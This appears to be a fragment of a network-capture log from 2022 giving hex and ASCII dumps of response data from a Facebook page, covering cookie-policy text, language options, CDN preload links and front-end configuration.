                                                                                                                                  2022-10-17 20:07:01 UTC301INData Raw: 79 20 74 68 61 74 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 73 68 61 72 65 20 77 69 74 68 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 69 6e 74 65 72 61 63 74 69 6f 6e 73 20 77 69 74 68 20 74 68 65 6d 2c 20 73 75 63 68 20 61 73 20 76 69 73 69 74 69 6e 67 20 74 68 65 69 72 20 61 70 70 73 20 6f 72 20 77 65 62 73 69 74 65 73 2e 20 54 68 65 79 20 75 73 65 20 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 33 30 35 30 33 37 39 37 32 36 35 31 35 36 5c 22 3e 42 75 73 69 6e 65 73 73 20 54 6f 6f 6c 73 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 73 75 63 68 20 61 73 20 46 61 63 65 62 6f 6f 6b 20 4c 6f 67 69 6e
                                                                                                                                  Data Ascii: y that businesses and organizations share with us about your interactions with them, such as visiting their apps or websites. They use our \u003Ca href=\"https:\/\/www.facebook.com\/help\/2230503797265156\">Business Tools\u003C\/a>, such as Facebook Login
                                                                                                                                  2022-10-17 20:07:01 UTC303INData Raw: 33 33 65 30 0d 0a 45 6a 53 4b 54 47 72 55 66 68 38 50 75 4b 33 77 4a 57 77 52 6b 6e 4d 74 36 7a 2d 6e 73 38 56 33 38 47 48 76 4d 63 64 45 78 67 62 49 50 34 5a 48 4f 74 6d 4b 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30
                                                                                                                                  Data Ascii: 33e0EjSKTGrUfh8PuK3wJWwRknMt6z-ns8V38GHvMcdExgbIP4ZHOtmKw\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00
                                                                                                                                  2022-10-17 20:07:01 UTC304INData Raw: 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 31 45 59 33 79 6c 6b 7a 6c 54 41 73 69 63 73 54 43 2d 70 52 6e 45 59 5f 4e 33 6a 38 75 6d 33 6e 43 2d 51 5a 38 43 6b 73 44 37 39 68 75 34 49 62 4a 39 4a 37 61 4a 57 45 30 69 35 48 52 4f 63 7a 64 6b 67 74 6b 4d 2d 66 65 30 71 44 6e 48 51 79 46 46 39 32 57 49 4f 57 72 31 64 4a 48 79 78 67 75 76 57 75 78 76 4f 37 62 65 65 70 66 6b 71 38 39 43
                                                                                                                                  Data Ascii: class=\"_9o-q\">\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&amp;h=AT1EY3ylkzlTAsicsTC-pRnEY_N3j8um3nC-QZ8CksD79hu4IbJ9J7aJWE0i5HROczdkgtkM-fe0qDnHQyFF92WIOWr1dJHyxguvWuxvO7beepfkq89C
                                                                                                                                  2022-10-17 20:07:01 UTC306INData Raw: 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 33 61 36 38 31 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22
                                                                                                                                  Data Ascii: lling cookies with browser settings\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_3a6818\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\"
                                                                                                                                  2022-10-17 20:07:01 UTC307INData Raw: 6a 56 4e 4f 64 6b 71 5f 39 49 6e 58 51 73 71 74 5f 6e 6d 4b 4d 54 47 58 6a 6f 78 4d 77 49 36 4e 35 57 39 4e 61 47 73 51 48 5a 48 58 58 44 58 45 61 46 64 69 54 79 34 77 52 62 62 77 39 31 63 61 56 44 4f 4f 30 43 4e 48 36 5a 6d 75 6f 30 55 7a 4c 56 70 45 5f 6d 67 70 7a 73 61 59 41 58 36 39 55 63 31 35 63 65 37 42 73 43 44 69 53 7a 33 45 77 64 36 76 70 75 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d
                                                                                                                                  Data Ascii: jVNOdkq_9InXQsqt_nmKMTGXjoxMwI6N5W9NaGsQHZHXXDXEaFdiTy4wRbbw91caVDOO0CNH6Zmuo0UzLVpE_mgpzsaYAX69Uc15ce7BsCDiSz3Ewd6vpuA\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Internet Explorer\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=
                                                                                                                                  2022-10-17 20:07:01 UTC309INData Raw: 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 62 6c 6f 67 73 2e 6f 70 65 72 61 2e 63 6f 6d 5c 75 30 30 32 35 32 46 6e 65 77 73 5c 75 30 30 32 35 32 46 32 30 31 35 5c 75 30 30 32 35 32 46 30 38 5c 75 30 30 32 35 32 46 68 6f 77 2d 74 6f 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 2d 69 6e 2d 6f 70 65 72 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 46 4a 38 63 4a 73 75 4b 30 51 68 55 4a 4b 63 66 6f 47 38 37 36 72 62 69 56 67 47 44 36 42 58 77 4b 47 42 7a 59 53 77 56 57 6e 41 39 42 37 73 44 76 6a 63 69 43 61
                                                                                                                                  Data Ascii: 003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fblogs.opera.com\u00252Fnews\u00252F2015\u00252F08\u00252Fhow-to-manage-cookies-in-opera\u00252F&amp;h=AT2FJ8cJsuK0QhUJKcfoG876rbiVgGD6BXwKGBzYSwVWnA9B7sDvjciCa
                                                                                                                                  2022-10-17 20:07:01 UTC310INData Raw: 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 6b 78 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 77 6e 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73 70 61 5c 75 30 30 66 31 61 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 46 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 51 62 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70
                                                                                                                                  Data Ascii: _markup_3310c079_0_5_kx",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_wn",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_Fe",{"__html":"Fran\u00e7ais (France)"},1],["__markup_3310c079_0_8_Qb",{"__html":"Italiano"},1],["__markup
                                                                                                                                  2022-10-17 20:07:01 UTC311INData Raw: 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 51 51 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 48 6e 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 39 39 39 39 5c 75 36 65 32 66 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 41 2b 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31
                                                                                                                                  Data Ascii: l":"\u4e2d\u6587(\u53f0\u7063)"},1],["__markup_3310c079_0_s_QQ",{"__html":"\u4e2d\u6587(\u7b80\u4f53)"},1],["__markup_3310c079_0_t_Hn",{"__html":"\u4e2d\u6587(\u9999\u6e2f)"},1],["__markup_3310c079_0_u_A+",{"__html":"\u65e5\u672c\u8a9e"},1],["__markup_331
                                                                                                                                  2022-10-17 20:07:01 UTC313INData Raw: 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 7d 5d 5d 2c 5b 22 55 49 54 69 6e 79 56 69 65 77 70 6f 72 74 41 63 74 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 52 65 73 65 74 53 63 72 6f 6c 6c 4f 6e 55 6e 6c 6f 61 64 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 68 79 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 68 79 22 7d 5d 5d 2c 5b 22 41 63 63 65 73 73 69 62 69 6c 69 74 79 57 65 62 56 69 72 74 75 61 6c 43 75 72 73 6f
                                                                                                                                  Data Ascii: www.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_hy"],[{"__m":"__elem_a588f507_0_0_hy"}]],["AccessibilityWebVirtualCurso
                                                                                                                                  2022-10-17 20:07:01 UTC314INData Raw: 69 61 6c 6f 67 43 42 54 53 65 74 74 65 72 22 2c 22 73 65 74 43 42 54 49 6e 46 6f 72 6d 41 6e 64 4c 6f 67 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 72 64 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 72 64 22 7d 2c 22 63 6c 69 65 6e 74 5f 6c 6f 67 67 65 64 5f 6f 75 74 5f 69 6e 69 74 5f 69 6d 70 72 65 73 73 69 6f 6e 22 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 63 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 49 44 22 3a 22 65 6d 61 69 6c 22 2c 22 73 65 72 76 65 72 50 72 65 66 69 6c 6c 22 3a 22 22 7d 5d 5d 2c 5b 22 46 6f 63 75
                                                                                                                                  Data Ascii: ialogCBTSetter","setCBTInFormAndLog",["__elem_835c633a_0_0_rd"],[{"__m":"__elem_835c633a_0_0_rd"},"client_logged_out_init_impression"]],["BrowserPrefillLogging","initContactpointFieldLogging",[],[{"contactpointFieldID":"email","serverPrefill":""}]],["Focu
                                                                                                                                  2022-10-17 20:07:01 UTC316INData Raw: 31 34 37 38 0d 0a 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 73 64 22 5d 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 63 73 73 22 5d 5d 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 5b 22 53 65 72
                                                                                                                                  Data Ascii: 1478anzaiScuba_DEPRECATED","PageTransitions","Animation"],"sd"]],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"css"]],["TimeSliceImpl"],["HasteSupportData"],["Ser
                                                                                                                                  2022-10-17 20:07:01 UTC317INData Raw: 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 32 76 51 72 39 58 61 47 56 53 46 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 64 2f 6c 2f 30 2c 63 72 6f 73 73 2f 44 41 54 67 4a 75 4e 70 65 41 4f 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22
                                                                                                                                  Data Ascii: oad" href="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/2vQr9XaGVSF.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/DATgJuNpeAO.css?_nc_x=Ij3Wp8lg5Kz" as="
                                                                                                                                  2022-10-17 20:07:01 UTC319INData Raw: 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 78 46 67 69 6a 41 33 64 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49 69 55 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66
                                                                                                                                  Data Ascii: .js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous" nonce="xFgijA3d" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwIiU.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href
                                                                                                                                  2022-10-17 20:07:01 UTC320INData Raw: 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 59 6f 32 55 7a 4f 68 22 2c 22 50 2f 6d 72 35 56 45 22 2c 22 5a 38 7a 36 59 6f 30 22 2c 22 63 68 58 77 50 72 55 22 5d 2c 69 64 3a 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 70 68 61 73 65 3a 30 2c 6c 61 73 74 5f 69 6e 5f 70 68 61 73 65 3a 74 72 75 65 2c 74 74 69 5f 70 68 61 73 65 3a 30 2c 61 6c 6c 5f 70 68 61 73 65 73 3a 5b 36 33 5d 2c 68 73 72 70 3a 7b 68 62 6c 70 3a 7b 63 6f 6e 73 69 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 34 30 32 37 31 31 7d 7d 7d 2c 61 6c 6c 52 65 73 6f 75 72 63 65 73 3a 5b 22 5a 36 4b 4e 6e 34 51 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 4b 68 62 44 71 4c 6d 22 2c 22 45 43 33 61 59 43 6f 22 2c 22 78 4e 55 41 4f 72 46 22 2c 22 6e 36 57 34 78 4d 48 22 2c
                                                                                                                                  Data Ascii: ","AcmZ15m","sjCQeza","Yo2UzOh","P/mr5VE","Z8z6Yo0","chXwPrU"],id:"first_response",phase:0,last_in_phase:true,tti_phase:0,all_phases:[63],hsrp:{hblp:{consistency:{rev:1006402711}}},allResources:["Z6KNn4Q","hyKmpuu","KhbDqLm","EC3aYCo","xNUAOrF","n6W4xMH",
                                                                                                                                  2022-10-17 20:07:01 UTC322INData Raw: 6e 3a 30 2c 6d 61 78 42 6c 6f 63 6b 4d 65 72 67 65 44 69 73 74 61 6e 63 65 3a 30 2c 65 6e 61 62 6c 65 5f 62 61 6e 7a 61 69 5f 73 74 72 65 61 6d 3a 74 72 75 65 2c 75 73 65 72 5f 74 69 6d 69 6e 67 5f 63 6f 69 6e 66 6c 69 70 3a 35 30 2c 62 61 6e 7a 61 69 5f 73 74 72 65 61 6d 5f 63 6f 69 6e 66 6c 69 70 3a 30 2c 63 6f 6d 70 72 65 73 73 69 6f 6e 5f 65 6e 61 62 6c 65 64 3a 74 72 75 65 2c 72 65 66 5f 63 6f 75 6e 74 69 6e 67 5f 66 69 78 3a 66 61 6c 73 65 2c 72 65 66 5f 63 6f 75 6e 74 69 6e 67 5f 63 6f 6e 74 5f 66 69 78 3a 66 61 6c 73 65 2c 61 6c 73 6f 5f 72 65 63 6f 72 64 5f 6e 65 77 5f 74 69 6d 65 73 6c 69 63 65 5f 66 6f 72 6d 61 74 3a 66 61 6c 73 65 2c 66 6f 72 63 65 5f 61 73 79 6e 63 5f 72 65 71 75 65 73 74 5f 74 72 61 63 69 6e 67 5f 6f 6e 3a 66 61 6c 73 65 7d
                                                                                                                                  Data Ascii: n:0,maxBlockMergeDistance:0,enable_banzai_stream:true,user_timing_coinflip:50,banzai_stream_coinflip:0,compression_enabled:true,ref_counting_fix:false,ref_counting_cont_fix:false,also_record_new_timeslice_format:false,force_async_request_tracing_on:false}
                                                                                                                                  2022-10-17 20:07:01 UTC323INData Raw: 57 79 31 4e 52 72 36 67 39 6e 45 6e 6c 39 59 59 64 5a 70 63 67 52 72 32 4e 6a 67 4d 6f 6d 37 41 33 4c 79 79 5a 37 45 39 53 68 47 34 41 69 33 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 32 39 34 32 34 36 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 31 62 72 57 7a 44 70 38 46 31 50 79 46 63 75 75 33 6b 77 4a 36 4f 50 31 6d 77 6a 68 32 41 35 55 46 6b 5f 2d 48 6c 78 79 79 36 57 79 31 4e 52 72 36 67 39 6e 45 6e 6c 39 59 59 64 5a 70 63 67 52 72 32 4e 6a 67 4d 6f 6d 37 41 33 4c 79 79 5a 37 45 39 53 68 47 34 41 69 33 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 32 36 38 32 22 2c 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 69 73 68 22 5d 2c 7b 5f 5f 72 63 3a 5b
                                                                                                                                  Data Ascii: Wy1NRr6g9nEnl9YYdZpcgRr2NjgMom7A3LyyZ7E9ShG4Ai3U"]},-1],["cr:1294246",["ReactDOM.classic"],{__rc:["ReactDOM.classic","Aa1brWzDp8F1PyFcuu3kwJ6OP1mwjh2A5UFk_-Hlxyy6Wy1NRr6g9nEnl9YYdZpcgRr2NjgMom7A3LyyZ7E9ShG4Ai3U"]},-1],["cr:2682",["warningBlueish"],{__rc:[
                                                                                                                                  2022-10-17 20:07:01 UTC324INData Raw: 52 59 4e 76 7a 58 51 77 31 65 62 43 49 32 78 6a 54 6a 36 30 66 38 4d 6b 5f 61 53 69 4e 36 32 74 67 6f 39 72 4c 64 76 45 6f 41 62 30 4f 35 34 36 4b 43 58 51 37 69 6f 77 33 46 2d 66 73 71 79 33 55 44 47 30 5a 47 73 34 67 6f 62 77 61 76 33 34 37 6b 37 53 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 32 39 32 33 36 35 22 2c 5b 22 52 65 61 63 74 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 32 42 44 55 4e 5a 38 48 57 32 71 74 34 6d 62 36 31 77 2d 6f 4a 48 55 71 4b 2d 4a 66 31 65 74 4c 35 6d 77 64 5f 4f 4b 55 54 76 62 37 5a 79 68 75 4a 7a 57 2d 36 35 4a 4e 5f 5a 41 36 7a 59 5f 68 5a 39 32 4b 64 38 35 75 73 72 76 70 35 37 64 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31
                                                                                                                                  Data Ascii: RYNvzXQw1ebCI2xjTj60f8Mk_aSiN62tgo9rLdvEoAb0O546KCXQ7iow3F-fsqy3UDG0ZGs4gobwav347k7SQ"]},-1],["cr:1292365",["React-prod.classic"],{__rc:["React-prod.classic","Aa2BDUNZ8HW2qt4mb61w-oJHUqK-Jf1etL5mwd_OKUTvb7ZyhuJzW-65JN_ZA6zY_hZ92Kd85usrvp57dQ"]},-1],["cr:1
                                                                                                                                  2022-10-17 20:07:01 UTC326INData Raw: 61 74 65 3d 31 22 7d 2c 33 30 33 32 5d 2c 5b 22 42 72 6f 77 73 65 72 50 61 79 6d 65 6e 74 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 65 6e 61 62 6c 65 64 3a 66 61 6c 73 65 7d 2c 33 39 30 34 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 65 6c 61 79 3a 31 30 30 30 2c 74 69 6d 65 6f 75 74 3a 36 34 2c 22 30 5f 64 65 6c 61 79 22 3a 30 2c 22 30 5f 74 69 6d 65 6f 75 74 22 3a 38 7d 2c 31 34 32 5d 2c 5b 22 54 72 61 63 6b 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 6f 6d 61 69 6e 3a 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 7d 2c 33 32 35 5d 2c 5b 22 63 72 3a 31 33 35 31 37 34 31 22 2c 5b 22 43 6f 6d 65 74 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b
                                                                                                                                  Data Ascii: ate=1"},3032],["BrowserPaymentHandlerConfig",[],{enabled:false},3904],["TimeSpentConfig",[],{delay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["TrackingConfig",[],{domain:"https://pixel.facebook.com"},325],["cr:1351741",["CometEventListener"],{__rc:[
